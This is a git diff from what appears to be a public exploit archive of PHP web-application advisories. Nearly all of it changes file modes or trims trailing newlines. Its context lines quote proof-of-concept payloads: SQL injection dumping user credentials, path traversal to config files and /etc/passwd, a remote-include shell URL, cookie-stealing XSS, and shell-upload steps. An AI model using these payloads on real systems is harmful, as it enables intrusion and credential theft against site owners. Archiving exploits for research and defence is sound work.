http://iJoomla.Magazine.v.3.0.1-_TKT_/com_magazine_3_0_1/magazine.functions.php?config=[SHeLL] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[~] -Greetings:  No - - - - - - \ No newline at end of file +Greetings:  No \ No newline at end of file diff --git a/platforms/php/webapps/14897.txt b/platforms/php/webapps/14897.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14901.txt b/platforms/php/webapps/14901.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14902.txt b/platforms/php/webapps/14902.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1491.php b/platforms/php/webapps/1491.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14910.txt b/platforms/php/webapps/14910.txt old mode 100755 new mode 100644 index 931bb8a70..440d962be --- a/platforms/php/webapps/14910.txt +++ b/platforms/php/webapps/14910.txt @@ -30,5 +30,4 @@ else { cout<<"No greeting ..\n"; } -=========================================================== - \ No newline at end of file +=========================================================== \ No newline at end of file diff --git a/platforms/php/webapps/14915.txt b/platforms/php/webapps/14915.txt old mode 100755 new mode 100644 index b59c3b631..4ff6a8273 --- a/platforms/php/webapps/14915.txt +++ b/platforms/php/webapps/14915.txt @@ -149,6 +149,4 @@ InterPhoto CMS has used Smarty library(Templet Engine). Add frist page : if(class_exists('Smarty')){ Add last page: - } - - \ No newline at end of file + } \ No newline at end of file diff --git a/platforms/php/webapps/1492.php b/platforms/php/webapps/1492.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14922.txt b/platforms/php/webapps/14922.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14923.txt b/platforms/php/webapps/14923.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14927.txt b/platforms/php/webapps/14927.txt old mode 100755 new mode 100644 index c383c29ac..df3dbf3e6 --- a/platforms/php/webapps/14927.txt +++ b/platforms/php/webapps/14927.txt @@ -64,7 +64,4 @@ DynPage is written in PHP and does not require MySQL database. It's easy to inst $_SESSION['DYNPAGE_CONF_VAR_ALL']['admin_email']="a@a.com"; ?> +POC:for see this hash: - http://www.Site.com/dynpage/content/dynpage_load.php?file=../conf/init.inc.php%00 - - - \ No newline at end of file + http://www.Site.com/dynpage/content/dynpage_load.php?file=../conf/init.inc.php%00 \ No newline at end of file diff --git a/platforms/php/webapps/1493.php b/platforms/php/webapps/1493.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14931.php b/platforms/php/webapps/14931.php old mode 100755 new mode 100644 index 57d05f271..1ffd98e25 --- a/platforms/php/webapps/14931.php +++ b/platforms/php/webapps/14931.php @@ -121,6 +121,4 @@ $guyanarules = new Javabridgexploit($argv); -?> - - \ No newline at end of file +?> \ No newline at end of file diff --git a/platforms/php/webapps/1494.php b/platforms/php/webapps/1494.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14942.txt b/platforms/php/webapps/14942.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14948.txt b/platforms/php/webapps/14948.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14952.txt b/platforms/php/webapps/14952.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14960.txt b/platforms/php/webapps/14960.txt old mode 100755 new mode 100644 index 70c7d49a3..cbf5b5ef5 --- a/platforms/php/webapps/14960.txt +++ b/platforms/php/webapps/14960.txt @@ -14,5 +14,4 @@ +Download : www.energyscripts.com/projects/essdownload/essdownload1.0.zip +Vulnerability : www.your script/download.php?PHPSESSID="Your Senssid"&file=../***** +Password Exploitable : www.your script/download.php?PHPSESSID="Your Senssid"&file=../../config.php ------------------------------------------------------------------------------------------ - \ No newline at end of file +----------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/php/webapps/14964.txt b/platforms/php/webapps/14964.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14965.txt b/platforms/php/webapps/14965.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14968.txt b/platforms/php/webapps/14968.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14973.txt b/platforms/php/webapps/14973.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14977.txt b/platforms/php/webapps/14977.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1498.php b/platforms/php/webapps/1498.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14985.txt b/platforms/php/webapps/14985.txt old mode 100755 new mode 100644 index cb100c1fe..c186e4f93 --- a/platforms/php/webapps/14985.txt +++ b/platforms/php/webapps/14985.txt @@ -30,6 +30,4 @@ Greetz to all brothers & sisters who are fighting for freedom in IRAN... خدا شما کمک خواهد کرد -contact : secret_hf@hotmail.com - - \ No newline at end of file +contact : secret_hf@hotmail.com \ No newline at end of file diff --git a/platforms/php/webapps/14986.txt b/platforms/php/webapps/14986.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14988.txt b/platforms/php/webapps/14988.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14989.txt b/platforms/php/webapps/14989.txt old mode 100755 new mode 100644 index 03a23f9c1..0a08b4717 --- a/platforms/php/webapps/14989.txt +++ b/platforms/php/webapps/14989.txt @@ -57,5 +57,4 @@ Muslim & Tunisian Hacker EnJoY o_O -./3x17 - \ No newline at end of file +./3x17 \ No newline at end of file diff --git a/platforms/php/webapps/14995.txt b/platforms/php/webapps/14995.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14996.txt b/platforms/php/webapps/14996.txt old mode 100755 new mode 100644 index 8129edf30..c8030fde6 --- a/platforms/php/webapps/14996.txt +++ b/platforms/php/webapps/14996.txt @@ -28,5 +28,4 @@ in GetTemplate function , line 113 to 127 [#] Greetings: Dr.2 , darkc0de team , inj3ct0r's Community , and all ma friends ,, -== - \ No newline at end of file +== \ No newline at end of file diff --git a/platforms/php/webapps/14997.txt b/platforms/php/webapps/14997.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14998.txt b/platforms/php/webapps/14998.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15006.txt b/platforms/php/webapps/15006.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1501.php b/platforms/php/webapps/1501.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15011.txt b/platforms/php/webapps/15011.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15014.txt b/platforms/php/webapps/15014.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15029.txt b/platforms/php/webapps/15029.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15037.html b/platforms/php/webapps/15037.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15039.txt b/platforms/php/webapps/15039.txt old mode 100755 new mode 100644 index 49a775bf2..51fc14e30 --- a/platforms/php/webapps/15039.txt +++ b/platforms/php/webapps/15039.txt @@ -33,4 +33,4 @@ e.g. http://server/product_reviews_info.php?products_id=4' ALLAH - الله لا إله لا ايل -To all my brothers & sisters in IRAN - god bless you - support the GREEN REVOLUTION \ No newline at end of file +To all my brothers & sisters in IRAN - god bless you - support the GREEN REVOLUTION \ No newline at end of file diff --git a/platforms/php/webapps/15040.txt b/platforms/php/webapps/15040.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15046.txt b/platforms/php/webapps/15046.txt old mode 100755 new mode 100644 index 34029f0ef..5f10232df --- a/platforms/php/webapps/15046.txt +++ b/platforms/php/webapps/15046.txt @@ -30,4 +30,4 @@ e.g. http://server/index.php?page_id=prod&brandid=248+and+1=0+Union+Select+[VISI ALLAH - الله لا إله لا ايل -To all my brothers & sisters in IRAN - god bless you - support the GREEN REVOLUTION \ No newline at end of file +To all my brothers & sisters in IRAN - god bless you - support the GREEN REVOLUTION \ No newline at end of file diff --git a/platforms/php/webapps/15049.txt b/platforms/php/webapps/15049.txt old mode 100755 new mode 100644 index b8682ffe8..f90eb938b --- a/platforms/php/webapps/15049.txt +++ b/platforms/php/webapps/15049.txt @@ -26,4 +26,4 @@ greatez: lagripe-dz mca_crb amine halim all dz members. -www.sec4ever.com / www.v4-team.com/cc/ / www.h4ckforu.com/vb/. \ No newline at end of file +www.sec4ever.com / www.v4-team.com/cc/ / www.h4ckforu.com/vb/. \ No newline at end of file diff --git a/platforms/php/webapps/15050.txt b/platforms/php/webapps/15050.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15060.txt b/platforms/php/webapps/15060.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15064.txt b/platforms/php/webapps/15064.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15070.txt b/platforms/php/webapps/15070.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15075.txt b/platforms/php/webapps/15075.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15080.txt b/platforms/php/webapps/15080.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15082.txt b/platforms/php/webapps/15082.txt old mode 100755 new mode 100644 index 98c9c09cd..90a45429c --- a/platforms/php/webapps/15082.txt +++ b/platforms/php/webapps/15082.txt @@ -61,4 +61,4 @@ Contact: K-159 || echo|staff || adv[at]e-rdc[dot]org Homepage: http://www.e-rdc.org/ --------------------------------- [ EOF ] ---------------------------------- \ No newline at end of file +-------------------------------- [ EOF ] ---------------------------------- \ No newline at end of file diff --git a/platforms/php/webapps/15084.txt b/platforms/php/webapps/15084.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15085.txt b/platforms/php/webapps/15085.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15090.txt b/platforms/php/webapps/15090.txt old mode 100755 new mode 100644 index 36ada0839..852dd4e36 --- a/platforms/php/webapps/15090.txt +++ b/platforms/php/webapps/15090.txt @@ -36,5 +36,4 @@ http://site/index.php?service=5&id=-4375+UNION+SELECT+1,2,3,concat(user,0x3a,pas -Good Luck - \ No newline at end of file +Good Luck \ No newline at end of file diff --git a/platforms/php/webapps/15091.txt b/platforms/php/webapps/15091.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15092.txt b/platforms/php/webapps/15092.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15093.txt b/platforms/php/webapps/15093.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15098.txt b/platforms/php/webapps/15098.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1511.php b/platforms/php/webapps/1511.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15110.txt b/platforms/php/webapps/15110.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15114.php b/platforms/php/webapps/15114.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15119.txt b/platforms/php/webapps/15119.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15121.txt b/platforms/php/webapps/15121.txt old mode 100755 new mode 100644 index 6bcfa2bf4..0e99a828c --- a/platforms/php/webapps/15121.txt +++ b/platforms/php/webapps/15121.txt @@ -56,6 +56,4 @@ Mail : !x! -{Greetz} All my friends |No-Exploit.com Members -------------------------------------- - - \ No newline at end of file +------------------------------------- \ No newline at end of file diff --git a/platforms/php/webapps/15126.txt b/platforms/php/webapps/15126.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1513.php b/platforms/php/webapps/1513.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15135.txt b/platforms/php/webapps/15135.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15141.txt b/platforms/php/webapps/15141.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15143.txt b/platforms/php/webapps/15143.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15145.txt b/platforms/php/webapps/15145.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15146.txt b/platforms/php/webapps/15146.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15147.txt b/platforms/php/webapps/15147.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15151.txt b/platforms/php/webapps/15151.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15153.txt b/platforms/php/webapps/15153.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15154.txt b/platforms/php/webapps/15154.txt old mode 100755 new mode 100644 index 588886f80..e4cebd0da --- a/platforms/php/webapps/15154.txt +++ b/platforms/php/webapps/15154.txt @@ -17,5 +17,4 @@ then get username & password n then go to the admin panel ,, # Greetings: Dr.2 , Inject0r's Community , AsbMay's Group , darkc0de team , and all ma friends ,, -== - \ No newline at end of file +== \ No newline at end of file diff --git a/platforms/php/webapps/15157.txt b/platforms/php/webapps/15157.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1516.php b/platforms/php/webapps/1516.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15164.txt b/platforms/php/webapps/15164.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15165.txt b/platforms/php/webapps/15165.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15166.txt b/platforms/php/webapps/15166.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15169.txt b/platforms/php/webapps/15169.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15171.txt b/platforms/php/webapps/15171.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15173.txt b/platforms/php/webapps/15173.txt old mode 100755 new mode 100644 index aace2d9ba..e566c99b2 --- a/platforms/php/webapps/15173.txt +++ b/platforms/php/webapps/15173.txt @@ -31,5 +31,4 @@ www.site.com/detail_article.php?C=3&P=1 and 1=2 <-- false www.site.com/detail_article.php?C=3&P=7"><script>alert(document.cookie);</script> - #################################################################### - \ No newline at end of file + #################################################################### \ No newline at end of file diff --git a/platforms/php/webapps/15174.txt b/platforms/php/webapps/15174.txt old mode 100755 new mode 100644 index 13930dfc3..ac3da4684 --- a/platforms/php/webapps/15174.txt +++ b/platforms/php/webapps/15174.txt @@ -19,4 +19,4 @@ http://www.example.com/tiki-5.2/tiki-jsplugin.php?plugin=x&language=../../../../ Cross Site Scripting: -http://www.example.com/tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(0)%3C/script%3E \ No newline at end of file +http://www.example.com/tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(0)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/15175.txt b/platforms/php/webapps/15175.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15177.pl b/platforms/php/webapps/15177.pl index 86099a80d..7cc7909b0 100755 --- a/platforms/php/webapps/15177.pl +++ b/platforms/php/webapps/15177.pl @@ -103,4 +103,4 @@ $target_id = $ARGV[1] || usage_exploit; header_exploit; $password = run_exploit ( \$target_id, \$vulnerable_page ); -print '[!]Password: ', $password, "\n"; \ No newline at end of file +print '[!]Password: ', $password, "\n"; \ No newline at end of file diff --git a/platforms/php/webapps/15194.txt b/platforms/php/webapps/15194.txt old mode 100755 new mode 100644 index 59881fc79..24655ac3a --- a/platforms/php/webapps/15194.txt +++ b/platforms/php/webapps/15194.txt @@ -27,4 +27,4 @@ http://tinymce.moxiecode.com/plugins_filemanager.php [~] Proud 2 be Muslim [~] United States of Albania -#################################################################### \ No newline at end of file +#################################################################### \ No newline at end of file diff --git a/platforms/php/webapps/15198.txt b/platforms/php/webapps/15198.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15200.txt b/platforms/php/webapps/15200.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15204.txt b/platforms/php/webapps/15204.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15205.txt b/platforms/php/webapps/15205.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15207.txt b/platforms/php/webapps/15207.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15208.txt b/platforms/php/webapps/15208.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15209.txt b/platforms/php/webapps/15209.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1521.php b/platforms/php/webapps/1521.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15210.txt b/platforms/php/webapps/15210.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15217.txt b/platforms/php/webapps/15217.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1522.php b/platforms/php/webapps/1522.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15220.txt b/platforms/php/webapps/15220.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15222.txt b/platforms/php/webapps/15222.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15223.txt b/platforms/php/webapps/15223.txt old mode 100755 new mode 100644 index 3a37a17af..dce8bd3c4 --- a/platforms/php/webapps/15223.txt +++ b/platforms/php/webapps/15223.txt @@ -24,5 +24,4 @@ AQ. "Rüyalarýma bitek Uyuyoken kavuþuyosam Anladýmki Ölmekte zor deðil.." http://VICTIM/Path/pwn.php?ID=1 [Blind] http://VICTIM/Path/pwn.php?ID=1 and 1=0 http://VICTIM/Path/pwn.php?ID=1 and 1=1 - ================================ - \ No newline at end of file + ================================ \ No newline at end of file diff --git a/platforms/php/webapps/15224.txt b/platforms/php/webapps/15224.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15225.txt b/platforms/php/webapps/15225.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15227.txt b/platforms/php/webapps/15227.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1523.cpp b/platforms/php/webapps/1523.cpp old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15232.txt b/platforms/php/webapps/15232.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15233.txt b/platforms/php/webapps/15233.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15234.txt b/platforms/php/webapps/15234.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15239.html b/platforms/php/webapps/15239.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1524.htm b/platforms/php/webapps/1524.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15240.txt b/platforms/php/webapps/15240.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15247.txt b/platforms/php/webapps/15247.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15249.txt b/platforms/php/webapps/15249.txt old mode 100755 new mode 100644 index 9b255dd78..1766aa31f --- a/platforms/php/webapps/15249.txt +++ b/platforms/php/webapps/15249.txt @@ -13,4 +13,4 @@ [~] STEP 2 > upload your shell as [shell.php.jpg :: or some times :: shell.php] - [~] Th3 End \ No newline at end of file + [~] Th3 End \ No newline at end of file diff --git a/platforms/php/webapps/15251.txt b/platforms/php/webapps/15251.txt old mode 100755 new mode 100644 index 2bfd0241a..596946c06 --- a/platforms/php/webapps/15251.txt +++ b/platforms/php/webapps/15251.txt @@ -33,5 +33,4 @@ clans website... no problem.---------------------------------------------------- # sky4@live.com # 4hm4d H0w4ri # Palestine In our Hearts -############################################################## - \ No newline at end of file +############################################################## \ No newline at end of file diff --git a/platforms/php/webapps/15254.txt b/platforms/php/webapps/15254.txt old mode 100755 new mode 100644 index 4ad45668d..312f8f683 --- a/platforms/php/webapps/15254.txt +++ b/platforms/php/webapps/15254.txt @@ -13,4 +13,4 @@ [~] STEP 2 > upload your shell as [shell.php.jpg] - [~] Th3 End \ No newline at end of file + [~] Th3 End \ No newline at end of file diff --git a/platforms/php/webapps/1526.php b/platforms/php/webapps/1526.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15268.txt b/platforms/php/webapps/15268.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15269.txt b/platforms/php/webapps/15269.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15276.txt b/platforms/php/webapps/15276.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15277.txt b/platforms/php/webapps/15277.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15278.txt b/platforms/php/webapps/15278.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15280.html b/platforms/php/webapps/15280.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15281.html b/platforms/php/webapps/15281.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15284.txt b/platforms/php/webapps/15284.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15295.html b/platforms/php/webapps/15295.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15300.txt b/platforms/php/webapps/15300.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15308.txt b/platforms/php/webapps/15308.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15309.txt b/platforms/php/webapps/15309.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15313.txt b/platforms/php/webapps/15313.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15321.txt b/platforms/php/webapps/15321.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15322.txt b/platforms/php/webapps/15322.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15323.txt b/platforms/php/webapps/15323.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15324.txt b/platforms/php/webapps/15324.txt old mode 100755 new mode 100644 index c4abda791..cfaaeecdc --- a/platforms/php/webapps/15324.txt +++ b/platforms/php/webapps/15324.txt @@ -15,4 +15,4 @@ The vulnerability exists due to failure in the "/index.php" script to properly s The following PoC is available: -Cookie: nova_lang=../../../../../../../../../../../../../../etc/passwd/././././.[>4095 * "/."]/././././. \ No newline at end of file +Cookie: nova_lang=../../../../../../../../../../../../../../etc/passwd/././././.[>4095 * "/."]/././././. \ No newline at end of file diff --git a/platforms/php/webapps/15325.txt b/platforms/php/webapps/15325.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15326.txt b/platforms/php/webapps/15326.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15327.txt b/platforms/php/webapps/15327.txt old mode 100755 new mode 100644 index 9fc5e6852..ebed939a0 --- a/platforms/php/webapps/15327.txt +++ b/platforms/php/webapps/15327.txt @@ -16,4 +16,4 @@ Attacker can alter queries to the application SQL database, execute arbitrary qu The following PoC is available: -Cookie: NRGNSID='SQL_CODE_HERE \ No newline at end of file +Cookie: NRGNSID='SQL_CODE_HERE \ No newline at end of file diff --git a/platforms/php/webapps/15328.txt b/platforms/php/webapps/15328.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15329.txt b/platforms/php/webapps/15329.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1533.php b/platforms/php/webapps/1533.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15330.txt b/platforms/php/webapps/15330.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15331.txt b/platforms/php/webapps/15331.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15332.txt b/platforms/php/webapps/15332.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15335.txt b/platforms/php/webapps/15335.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15338.txt b/platforms/php/webapps/15338.txt old mode 100755 new mode 100644 index a5b5e901a..e2bade20e --- a/platforms/php/webapps/15338.txt +++ b/platforms/php/webapps/15338.txt @@ -29,5 +29,4 @@ Contact : eragon@legends.ag [ Special Thanks : KuBaNeZi , DJ-DUKLI , The|Denny` , Loock3D , BaDBoY ] -[ Visit / Greetz : ALBANIAN-LEGENDS.COM Members - www.eragon.ws - www.uah1.org.uk ] - \ No newline at end of file +[ Visit / Greetz : ALBANIAN-LEGENDS.COM Members - www.eragon.ws - www.uah1.org.uk ] \ No newline at end of file diff --git a/platforms/php/webapps/15340.txt b/platforms/php/webapps/15340.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15343.php b/platforms/php/webapps/15343.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15345.txt b/platforms/php/webapps/15345.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15348.txt b/platforms/php/webapps/15348.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15353.txt b/platforms/php/webapps/15353.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15354.txt b/platforms/php/webapps/15354.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15355.txt b/platforms/php/webapps/15355.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15366.txt b/platforms/php/webapps/15366.txt old mode 100755 new mode 100644 index 4efa3f338..219c67897 --- a/platforms/php/webapps/15366.txt +++ b/platforms/php/webapps/15366.txt @@ -25,4 +25,4 @@ Joomla Component com_flipwall SQL Injection Vulnerability < -- bug code start -- > EXPLOIT : null+union+select+1,2,3,4,5,concat(username,0x3a,password)fl0rix,7,8,9,10+from+jos_users-- -< -- bug code end of -- > \ No newline at end of file +< -- bug code end of -- > \ No newline at end of file diff --git a/platforms/php/webapps/15367.txt b/platforms/php/webapps/15367.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15369.php b/platforms/php/webapps/15369.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15370.txt b/platforms/php/webapps/15370.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15381.txt b/platforms/php/webapps/15381.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15385.txt b/platforms/php/webapps/15385.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15386.txt b/platforms/php/webapps/15386.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15387.txt b/platforms/php/webapps/15387.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15389.php b/platforms/php/webapps/15389.php old mode 100755 new mode 100644 index eb93a0379..d3eedbdd1 --- a/platforms/php/webapps/15389.php +++ b/platforms/php/webapps/15389.php @@ -73,7 +73,4 @@ while(1)  }  else break; } -?> - - - \ No newline at end of file +?> \ No newline at end of file diff --git a/platforms/php/webapps/1539.txt b/platforms/php/webapps/1539.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15391.txt b/platforms/php/webapps/15391.txt old mode 100755 new mode 100644 index 49cee6153..25ba0ed75 --- a/platforms/php/webapps/15391.txt +++ b/platforms/php/webapps/15391.txt @@ -25,4 +25,4 @@ [+] vuln: [SearCh And Find It :P] -######################################################################## \ No newline at end of file +######################################################################## \ No newline at end of file diff --git a/platforms/php/webapps/15400.txt b/platforms/php/webapps/15400.txt old mode 100755 new mode 100644 index d52913554..12d82dd08 --- a/platforms/php/webapps/15400.txt +++ b/platforms/php/webapps/15400.txt @@ -46,4 +46,4 @@ http://localhost/Dolphin/gzip_loader.php?file=(file name) # I'm anT!-Tr0J4n member from Inj3ct0r Team #[+] Site : Inj3ct0r.com -#[+] Support e-mail : submit[at]inj3ct0r.com \ No newline at end of file +#[+] Support e-mail : submit[at]inj3ct0r.com \ No newline at end of file diff --git a/platforms/php/webapps/15404.txt b/platforms/php/webapps/15404.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15405.txt b/platforms/php/webapps/15405.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15409.txt b/platforms/php/webapps/15409.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15412.txt b/platforms/php/webapps/15412.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15413.txt b/platforms/php/webapps/15413.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15414.txt b/platforms/php/webapps/15414.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15415.txt b/platforms/php/webapps/15415.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15416.txt b/platforms/php/webapps/15416.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15430.txt b/platforms/php/webapps/15430.txt old mode 100755 new mode 100644 index 8d16869f3..2cbaf3ebf --- a/platforms/php/webapps/15430.txt +++ b/platforms/php/webapps/15430.txt @@ -24,5 +24,4 @@ Joomla Component ccinvoices SQL Injection Vulnerability < -- bug code start -- > EXPLOIT : null+and+1=0+union+select+1,2,3,4,5,6,7,8,version(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -< -- bug code end of -- > - \ No newline at end of file +< -- bug code end of -- > \ No newline at end of file diff --git a/platforms/php/webapps/15439.txt b/platforms/php/webapps/15439.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15440.txt b/platforms/php/webapps/15440.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15441.txt b/platforms/php/webapps/15441.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15442.txt b/platforms/php/webapps/15442.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15443.txt b/platforms/php/webapps/15443.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15447.txt b/platforms/php/webapps/15447.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15452.txt b/platforms/php/webapps/15452.txt old mode 100755 new mode 100644 index cfc1cebf8..34471d262 --- a/platforms/php/webapps/15452.txt +++ b/platforms/php/webapps/15452.txt @@ -21,5 +21,4 @@ http://www.site.com/[path]/userlist.php?username[]=&show_group=-1&sort_by=userna http://www.site.com/[path]/moderate.php?get_host[]= -#SYSTEM_OVERIDE [07-11-2010] - \ No newline at end of file +#SYSTEM_OVERIDE [07-11-2010] \ No newline at end of file diff --git a/platforms/php/webapps/15453.txt b/platforms/php/webapps/15453.txt old mode 100755 new mode 100644 index a8445685f..8d1279e9b --- a/platforms/php/webapps/15453.txt +++ b/platforms/php/webapps/15453.txt @@ -15,7 +15,4 @@ 